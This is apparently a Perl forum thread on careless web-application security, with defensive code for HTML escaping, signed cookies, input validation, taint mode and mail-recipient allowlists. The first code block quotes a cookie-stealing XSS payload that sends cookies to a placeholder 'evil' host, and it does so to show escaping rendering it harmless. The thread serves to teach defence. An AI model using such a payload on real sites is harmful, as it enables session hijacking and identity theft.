I was at a presentation of a local user group recently. I won't give more details than that, to avoid embarrassing the guilty parties. However, the presenter talked about an e-commerce web application that he had spent a year developing and that was already in production. Part of the application involved doing a database query and showing the result on the web page. When I noticed no particular care being given to escaping HTML entities, I asked point blank, "What considerations are you making to avoid cross-site scripting attacks?" His response made my jaw drop (after I stopped giggling): he went into detail about the security of the cookies being sent to the browser. All of which was cool, but it was exactly the wrong place to look to avoid cross-site scripting attacks, where one user can place HTML that gets displayed to another user, and thereby execute JavaScript which steals cookies, and therefore identities and everything that implies.
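For anyone wondering what "escaping HTML entities" looks like in practice, here's a minimal hand-rolled sketch in Perl (illustrative only; a CPAN module such as HTML::Entities does the same job and more):

```perl
use strict;
use warnings;

# Neutralize the characters that let user-supplied text break out of an
# HTML text context and inject markup. A single-pass substitution means
# an '&' already in the input can't be double-escaped.
sub escape_html {
    my ($text) = @_;
    my %map = (
        '&' => '&amp;',
        '<' => '&lt;',
        '>' => '&gt;',
        '"' => '&quot;',
        "'" => '&#39;',
    );
    $text =~ s/([&<>"'])/$map{$1}/g;
    return $text;
}

# A classic cookie-stealing payload, rendered harmless:
my $evil = q{<script>document.location='http://evil/'+document.cookie</script>};
print escape_html($evil), "\n";
```

Anything a visitor submitted that might be echoed back into a page goes through a filter like this; the markup then displays as text instead of executing.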

I'm shocked. Is this typical? Are people developing "web applications" without paying attention to Bugtraq and CERT notices, or even noticing that something they might be doing might be compromising their customers' security?

A few minutes later, I asked about cookie usage, wondering if the path of the cookie was being set properly, since he reported that sometimes you get "logged out" inconsistently. It took about six tries before he had a clue what I was asking.

And then he was talking about putting entire SQL queries into a cookie to provide paging access through the result set! As if by luck, he figured out that that "might be insecure", so instead he simply puts the parameters of the query into cookies!
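Even putting just the parameters into cookies leaves them open to tampering. If state like paging parameters really must round-trip through the client, one common defense (a sketch, not what the presenter did; the secret below is hypothetical and lives only on the server) is to sign the value with an HMAC so alteration is detectable:

```perl
use strict;
use warnings;
use Digest::SHA qw(hmac_sha256_hex);

my $secret = 'server-side secret, never sent to the client';  # hypothetical

# Append a keyed MAC so the client can hold the value but not forge it.
sub sign_value {
    my ($value) = @_;
    return $value . '|' . hmac_sha256_hex($value, $secret);
}

# Recover the value only if the MAC still matches; undef means tampered.
sub verify_value {
    my ($cookie) = @_;
    my ($value, $mac) = $cookie =~ /^(.*)\|([0-9a-f]{64})$/s or return;
    return hmac_sha256_hex($value, $secret) eq $mac ? $value : undef;
}

my $cookie = sign_value('page=3');
print defined verify_value($cookie) ? "ok\n" : "tampered\n";
```

And signed or not, the server should still re-validate the parameters on every request; the signature only proves the client didn't edit them, not that they were sane to begin with.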

Clues, people. Clues. These are all basic security issues, ignorance of which results in loss of revenue or privacy, possibly undetected.

As one person left the presentation, she commented quietly to me, "I like your brain." Which I'll presume to mean that I was asking exactly the right questions, and proved that this wasn't the guy the rest of us should be learning strategy from.

If you design for the web, remember that it's much better to have a non-functional secure site than a non-secure functional site.

A few years ago I might have said, "score, chalk one more for Common Sense Man", but you must remember (I must remember), Common Sense Man dispenses Common Sense for a living.

That is excellent advice to remember, so here is even more: if you're "designing" things, make sure you don't do it alone. Very few people can cover all their bases and cover them well. If you're going to bother to consider security at all (and you should), get a security consultant whose sole purpose is to think of these things ~ someone like you (it helps if the person keeping an eye on security is not merely a common-sense guy who knows how things work, but one who can make them work too).

Also, and I know you know this, security is best implemented before anything's written (have the security guy attend the design meetings, mmkay).

And most importantly, if you're ever giving any kind of presentation, have somebody who is relatively an expert in whatever you're presenting give you a review (how can you sell anything with your presentation if you have someone in the audience giggling at your ignorance? ~ heeey, here's a novel idea: bring your development team, and the security guy, to field these types of questions; it'll save you from starving).

Heh. And the worst part is that the guy himself probably did not realize he was doing something wrong. I find it pretty strange that people can still miss those simple security measures, when just about every manual or tutorial for web programming mentions, in one way or another, security rule #1: "Do not trust what your visitors submit." Or, for that matter, trust your visitors at all. Even the most benevolent user might submit something harmful, and what about the malicious?

Personally, I try to make sure that nothing that is submitted goes unchecked, especially if it might be part of a SQL query, or has any chance of being displayed back in the browser.
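As a sketch of that "nothing goes unchecked" policy: validate every submitted value against a strict known-good pattern (default deny), and even then hand it to the database only through DBI placeholders, never by interpolating it into the SQL string. The patterns here are illustrative:

```perl
use strict;
use warnings;

# Accept a value only if the WHOLE value matches a known-good pattern;
# anything else is rejected outright.
sub check_param {
    my ($value, $pattern) = @_;
    return defined $value && $value =~ /^$pattern$/ ? $value : undef;
}

my %rules = (
    id    => qr/\d{1,10}/,
    email => qr/[\w.+-]+\@[\w-]+(?:\.[\w-]+)+/,   # deliberately strict
);

print defined check_param('42', $rules{id}) ? "id ok\n" : "id bad\n";
print defined check_param('42; DROP TABLE users', $rules{id})
    ? "id ok\n" : "id bad\n";

# Checked or not, values reach SQL only via placeholders, e.g.:
#   my $sth = $dbh->prepare('SELECT name FROM users WHERE id = ?');
#   $sth->execute($id);
```

The placeholder is the real safety net; the pattern check just rejects garbage early and gives you a place to log attempts.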

That said, I once, about two or three years ago, saw a site that had SQL statements embedded in the HTML! More specifically, in VB scripts on the pages. I have no real idea how that worked, or why it would be in the client-side VB code... it is altogether possible that it didn't work, but was just some strange copy/paste error. Then again, given the total integration and (at least earlier) lack of security compared to "features" in Microsoft's systems... I know very little about VB/ASP etc., and at that time I knew nothing. :) That doesn't mean they weren't the real queries (with logic around them), including table names, column names, variables passed in, etc., and that could have been disastrous for those guys. "Gee, I wonder if I can end this submit with a semi-colon and then..." - well, you know the drill. Sadly, I never remembered to save that URL. I'm pretty sure it didn't last long anyway, at least not in that form.

Good node, and hopefully food for thought that will help one or two sites out there be more secure. :)

You have moved into a dark place.
It is pitch black. You are likely to be eaten by a grue.

Agreed; clueless companies sometimes hire clueless people to write code that impacts the bottom line. These people don't do the extensive and continual learning that is required. One senior ASP guy I know is relatively clueful but hates reading (eek!). People base their ideas on the things they can see, and security is usually not one of them. This is related to the discussions of insecure cut-and-paste scripts on the net.

I've done code review and evangelism but it doesn't end. Once I was asked to review someone's work for the cross-site scripting vulnerability which is good news, but most people do not understand the concept of building in security from the start, as you probably know.

I've often thought PM should have a well-organized section on security. Something more than the "CGI programming" page. It could include skeleton code, CPAN module reviews, and writeups on the issues and security philosophy. Maybe it could have a security issues checklist for clients to ask programmers to answer.

I think most monks figure out their own security strategies, which is okay, this is Perl, but rolling your own is not a good strategy if you can't write the unit test. So what if each of us has to absorb a hundred megabytes a year just to stay alert. But new programmers? They often don't know anything about engineering or accepted practices. Or they cross over from their real discipline. There's perlsec, but it doesn't cover everything. We should at least point them to a book or something, maybe yours.

If we are trying to increase the number of Perl programmers, maybe we should start with security. Something organized would improve security on the web, I think. Type "Security" into the search box and you get a good thread, but just a short one, you know? Advanced programmers could benefit too. For example, login code for CGI::Application with versions using and not using Apache auth modules, for starters.

Not coming directly from a computer background, but having had enough interaction with it, it seems to me that security, or as someone else put it, "distrusting any user input", is not something typically taught in computer courses; or if it is, it's an afterthought to the rest of the course. True, this is usually not directly a language issue but more of a general programming design issue, but again, I've seen some CSE course listings that don't really have a design course at any point, only technology on top of technology. Even if you look at computer books, security is not heavily emphasized (a quick memory flip through the ORA CGI mouse book doesn't bring to mind any major security coverage in the early part of the book, as one example). In addition, as .NET and Java become more popular with their 'sandbox', too many people take security for granted, so it's bound to continue this way. Thus, you get people like the above, or Matt's Script Archive, or numerous other examples.

Thus, IMO, this is something that needs to be fundamentally changed at the low level of CSE-type programs, to encourage building the design around security before any code is written, and to use the language to advantage to track insecure input. Perl is one of the few that has this feature, with taint mode; by default, languages like C, C++, or Java lack it. It would take more work for those languages to adapt, but it's certainly not impossible.
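For those who haven't used it: under taint mode (perl -T), data from outside the program can't reach the shell, open(), eval, etc. until it has passed through a regex capture, which is Perl's declared "I checked this" step. A sketch of the idiom, with a deliberately narrow pattern (illustrative; real patterns depend on what the value is for):

```perl
use strict;
use warnings;

# Extracting via a capture is what untaints under -T, so the pattern IS
# the security check: one dot-separated name, no slashes, no leading dot,
# so path tricks like '..' or '../../etc/passwd' can't sneak through.
sub untaint_filename {
    my ($input) = @_;
    my ($clean) = ($input // '') =~ /^([\w-]+(?:\.[\w-]+)?)$/;
    return $clean;   # undef if the input didn't match
}

print untaint_filename('report.txt')        // 'REJECTED', "\n";
print untaint_filename('../../etc/passwd')  // 'REJECTED', "\n";
```

The trap taint mode guards against is the lazy untaint, /^(.*)$/, which "launders" anything; the feature only helps if the capture really is as strict as the one above.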

-----------------------------------------------------
Dr. Michael K. Neylon - mneylon-pm@masemware.com
||
"You've left the lens cap of your mind on again, Pinky" - The Brain
"I can see my house from here!"
It's not what you know, but knowing how to find it if you don't know that's important

Not only is security not layered in from the start, it's not taught to folks either; and I think there is a set of developers who don't think it's as important as it is. This is probably due to lack of training, because I don't think folks want to do a bad job if they KNOW they are doing a bad job.

I view CGI security like nutrition education related to health care in the US. If everyone were taught it and understood it, from the very beginning, many problems would be avoided.

I did a code review for a woman who built a formmail.pl like script. She accepted "to" addresses straight from submitted form elements with no "validity" checking (like making sure only certain addresses could be mailed to, or better yet, taking email addresses right off the page and integrating them into her app), making her script (which she distributes on her website, BTW) ripe for hijacking by spammers. When I pointed this out to her, her response was "No one is going to bother to figure it out. Besides, I want my scripts to be usable by average humans."

Her point being that security by obscurity was enough, and that "security" ne "usability". My reply back was that if you're doing something, you should do it RIGHT, and that not protecting your users is a BAD THING. At least give them the option of a secure script. If someone is going to install a freakin' script, they can make a list of valid email addresses (or maybe they shouldn't be using CGI scripts. . .). Anyway, she wanted to work collaboratively on a project with me. . . I think I'll pass on this one.
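That "list of valid email addresses" costs about ten lines. A sketch of the allowlist (the addresses are hypothetical; in her script this would be configured by whoever installs it, and the form's "to" field is only honoured if it maps to an entry):

```perl
use strict;
use warnings;

# Recipients the installer has approved; everything else is refused,
# so the script can't be hijacked as an open mail relay by spammers.
my %allowed_to = map { $_ => 1 } qw(
    sales@example.com
    support@example.com
);

# Return the canonical recipient, or undef if the form asked for
# anyone not on the list.
sub recipient_for {
    my ($form_to) = @_;
    return $allowed_to{ lc($form_to // '') } ? lc $form_to : undef;
}

print recipient_for('SALES@example.com')      // 'REJECTED', "\n";
print recipient_for('victim@spam-target.net') // 'REJECTED', "\n";
```

Still perfectly usable by "average humans": the installer edits one list, and legitimate form submissions work exactly as before.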

Secrets and Lies: Digital Security in a Networked World (ISBN 0471253111). Really gets into why security is a process, not just a checkbox ("Yeah, we're using only SSL so we don't need to worry about anything else.").

And it's fairly hefty, so it'll leave a good welt when you clobber someone with it after pointing out what sage kernel of advice they've ignored. :)

One more clue (or lack thereof) story. I stumbled upon this during some consulting/integration work I'm doing for a client.

My client outsources a major application from a company. The company provides an XML based API to do various management functions. You pass commands in a simple XML format via POST'ed forms.

Here's where the strangeness starts: you have to pass the admin username/password to access the management features, obviously.

Well, one of the ways they advocate interfacing with their API is to send an HTML page back to the client (the person at the web browser, in this case) with the form and data you want to POST (yes, with the admin username/password in it). The page has a JavaScript "onLoad()" handler that submits the form back into the API. This made my hair stand on end: this page with the admin info will be stored in the cache, and what if the user has JavaScript turned off (say, if they were trying to hack the outsourced application)? I hope no one actually implements this, but I suspect that, for people using languages without LWP, it's probably the only easy way to do it.

I'm doing all the API work server-side with LWP::UserAgent because there's NO WAY IN HELL that I would send the admin username/password to the client. What the hell are they thinking? This app stores personal info about people (potentially CC numbers too). I pointed this out to them, and they said "We'll look into this. . ." I plan on following up with them soon, because I just can't let this one slip.
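For the curious, the safe shape of this is roughly the following sketch. The vendor's endpoint, XML element names, and credentials are all hypothetical (their real API surely differs); the point is only that the request is built and sent server-side, so the admin password never appears in anything rendered to a browser:

```perl
use strict;
use warnings;

# Build the XML command for the vendor's API. Element names are made up
# for illustration; values here are trusted server config, so no XML
# escaping is shown (a real version should escape them anyway).
sub build_api_request {
    my (%args) = @_;
    return sprintf(
        '<request><auth user="%s" pass="%s"/><command>%s</command></request>',
        @args{qw(user pass command)},
    );
}

my $xml = build_api_request(
    user    => 'admin',
    pass    => 'hunter2',       # from server config, NEVER from the client
    command => 'list_accounts',
);

# The POST then happens entirely server-side, e.g. with LWP::UserAgent:
#   my $res = LWP::UserAgent->new->post($api_url, { xml => $xml });
# and only the processed result, credential-free, goes back to the browser.
print $xml, "\n";
```

Nothing in the response pipeline ever needs to contain the credentials, which is exactly what the vendor's onLoad() trick gets wrong.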

The outsourced app is actually pretty amazing, feature/function-wise; it just seems like there is a disconnect somewhere along the way.

Maybe it would help if you had links to what people should be looking at so that your post is helpful to those not as enlightened as yourself. This way people might avoid your criticism in the future, or at least be told that they should have looked here first.

I'm shocked. Is this typical? Are people developing "web applications" without paying attention to Bugtraq and CERT notices, or even noticing that something they might be doing might be compromising their customer's security?

I wouldn't be surprised if it was typical. Heck, even Microsoft only recently took a month's vacation from writing code to beef up software security.

My view is that security really is a full-time position. There are just too many exploits going on for the average person to keep track of. No wonder people ignore security concerns or are ignorant of them.

As funny as ignorance is, I'm more interested in the solution you gave him. If you could post the example code you showed him or a link to the resource you pointed him to I'm sure we'd all be able to learn from it.

Are people developing "web applications" without paying attention to Bugtraq and CERT notices

In most cases they probably are, but that's a very small part of the problem. Aside from an occasional PHP vulnerability or the like, CERT and Bugtraq don't really apply that much to people who are in charge of only developing small web apps. Good programming practices that lead to more secure code are more important than reading every post to Bugtraq in these cases. Of course, it's an entirely different story if they're paying you to set up their servers or do a security audit.

If you design for the web, remember that it's much better to have a non-functional secure site than a non-secure functional site.

Security is not an all-or-nothing issue. It is often necessary to reduce security in favour of usability (if you disagree, consider how you got to this site :). That said, the example you give introduces vulnerabilities needlessly, so your point is still important to keep in mind.

And finally, to add a bit more educational value to this thread, here are a few relevant links:

Unfortunately, security is rarely considered a part of the functionality of the software, and therefore almost never makes it (easily) onto the objectives list for a project. Almost every project I have been involved in, I have had to fight to get the security issue on the table.

IMO the issue of security has been left out of the training of most IT and business people, from the college level through to the licensing and professional training courses. Many of the projects I have worked on have been driven by business units' needs and wants. They were almost always unwilling to talk about security.

A serious issue in workplace management and recognition has to do with the weighting of "visible" code vs. "non-visible" or "negative user experience" code. Many times programmers (in places I have worked) are recognized for the end-user functionality they create that contributes to productivity on a daily basis. Most security development detracts from the volume of "visible" code kicked out, and/or adds to the "negative user experience". The promotions I have seen handed out have not gone to individuals who care about security, but rather to those who care almost exclusively about highly "visible" code. Is it fiscally worth it to the average developer (who is normally on to the next position before 3 years are up) to spend extra time building in transparent or potentially user-impeding code for security, rather than pumping out more "highly visible" productivity warez that get them the faster promotions and the better pay, position, and relations?

Security runs into the same issues as administration. You are not visible and normally not given much of a budget until the fire burns bright. Then, it may be your job.

The hard part I have seen has been selling business people and developers on the concept of building a sound piece of software that can handle the unexpected, providing a better path for growth, security, and reusability. Maybe the issue has more to do with our consumption-market mentality. We tend to burn right through resources (time/energy/money/etc.) without really thinking about the long-term effects of what we do. We want it now, and keep applying tape in flight.

Any good, though not necessarily experienced, programmer will know their own level of incompetence. I've been programming for a long time, but I know I'm dangerous when I'm writing production code in a new area I'm inexperienced in. I'm especially dangerous if I don't feel any fear, since then I think I'm doing fine even though I'm probably heading for the abyss. As others have mentioned, design/code reviews are a must to keep me honest.

Security is like error checking: you must build it into the design from the start, and the quality/quantity of it must be in direct proportion to the damage that can be caused if you don't get it right. If it's some silly little app you are running on your machine at home, who cares if it gets hacked? If you are taking a CC number, think "testify", "jail time", "bankruptcy" (esp. if it happens to be mine :-).
